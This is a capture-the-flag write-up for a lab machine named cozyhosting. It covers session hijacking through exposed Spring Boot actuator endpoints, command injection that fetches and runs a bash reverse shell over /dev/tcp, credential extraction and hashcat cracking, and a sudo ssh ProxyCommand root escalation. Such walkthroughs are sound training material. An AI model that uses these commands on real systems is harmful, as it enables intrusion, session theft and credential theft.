
First, I added the new host to my known ones:

sudo echo " cozyhosting.htb" | sudo tee -a /etc/hosts

Then, I performed a Nmap scan:

nmap -sC -T4 -p- cozyhosting.htb > sC.txt
22/tcp open  ssh
| ssh-hostkey: 
|   256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_  256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open  http
|_http-title: Cozy Hosting - Home

So I checked its website:

Now I decided to perform some enumeration using dirsearch ๐Ÿ“:

dirsearch -u http://cozyhosting.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[21:46:04] 200 -    4KB - /login                                            
[21:46:04] 401 -   97B  - /admin                                            
[21:46:07] 204 -    0B  - /logout 

So I inspected the /login endpoint:

And also the /error endpoint:

Searching over the internet we get that this error is typical from springboot:

So Iโ€™ll perform some further enumeration with another wordlist:

dirsearch -u http://cozyhosting.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/spring-boot.txt
[21:52:22] 200 -  634B  - /actuator                                         
[21:52:22] 200 -  487B  - /actuator/env/path                                
[21:52:22] 200 -   15B  - /actuator/health                                  
[21:52:22] 200 -  487B  - /actuator/env/home                                
[21:52:22] 200 -    5KB - /actuator/env                                     
[21:52:22] 200 -  487B  - /actuator/env/lang
[21:52:22] 200 -   10KB - /actuator/mappings                                
[21:52:22] 200 -  148B  - /actuator/sessions                                
[21:52:22] 200 -  124KB - /actuator/beans 

Upon exploring /actuator different endpoints I got into /mappings, which provides a detailed overview of the mappings of the app:

I noticed the endpoint /sessions, which displays all the active sessions:

Thereโ€™s an active session of a user called kanderson:

I got the admin cookie :D

So I changed the cookie and accessed the admin portal:

I decided to test the โ€œautomatic patchingโ€ function:

Got and error:

So I suppose that this function tries to connect to a host using a private ssh key like:

ssh -i ird_rsa username@hostname

So Iโ€™ll try some command injections against the username field:

# First I set up a python server
python3 -m http.server 8090

I got an error so that username canโ€™t contain whitespaces, so Iโ€™ll use ${IFS}, which is a Unix Environment Variable that stans for Internal Field Separator


Got the request!


So now I can create a reverse shell in my machine, upload to the host and then execute it:

# First, create the shell in our machine
echo -e '#!/bin/bash\nsh -i >& /dev/tcp/ 0>&1' >
# Now download it in the host (Command Injection) and execute it

Got a reverse shell :D


There is a user called josh int the machine. Also, there is a .jar file inside the /app directory called cloudhosting-0.0.1.jar. We can extract the content of the .jar to examine it:

unzip -d /dev/shm cloudhosting-0.0.1.jar
ls -la
total 28
drwxrwxrwt  5 root     root       120 Feb  8 21:28 .
drwxr-xr-x 19 root     root      3980 Feb  7 18:34 ..
drwxr-xr-x  4 app      app        120 Aug 10  2023 BOOT-INF
drwxr-xr-x  3 app      app         80 Aug 10  2023 META-INF
drwxr-xr-x  3 app      app         60 Feb  1  1980 org
-rw-------  1 postgres postgres 26976 Feb  7 18:34 PostgreSQL.3698546292

I can try to read BOOT-INF/classes/ in spite of finding some creds:

cat BOOT-INF/classes/ 
management.endpoint.sessions.enabled = true

Got creds for the database :D postgres:Vg&nvzAQ7XxR

I connected to the database using psql:

psql -h -p 5432 -U postgres

I listed the databases using \l:

Then I switched to the cozyhosting database:

\c cozyhosting

Now I listed the content of it:


Now I list all the info of table users:

SELECT * FROM users;

 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm

Iโ€™ll now crack admin hash using Hashcat (which seems to be using bcrypt):

hashcat -m 3200 -a 0 -o cracked.txt hashes.txt /usr/share/wordlists/rockyou.txt

We finally got user creds :D josh:manchesterunited

User flag

Privilege Escalation

If we check for sudo privileges:

sudo -l
(root) /usr/bin/ssh *

So searching over the internet we find this bypass at GTFOBins:

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

Root flag

Machine pwned!